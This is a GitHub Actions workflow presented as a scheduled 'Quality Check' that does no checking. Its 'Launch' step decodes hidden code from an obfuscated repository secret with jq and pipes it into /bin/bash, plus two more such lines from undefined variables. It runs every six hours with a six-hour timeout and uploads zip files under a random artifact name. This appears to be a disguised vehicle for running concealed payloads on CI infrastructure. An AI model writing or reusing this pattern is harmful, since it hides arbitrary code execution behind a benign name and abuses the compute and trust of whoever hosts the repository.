name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '24 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          j462: ${{ secrets.j462 }}
        run: |
          printf '%s' "$j462" | jq -r .igx90504 | /bin/bash
          echo $lnydj626 | jq -r .vbs98999 | /bin/bash
          echo $vnq54 | jq -r .d9 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: nWeb0rTL
          path: "*.zip"
          retention-days: 1
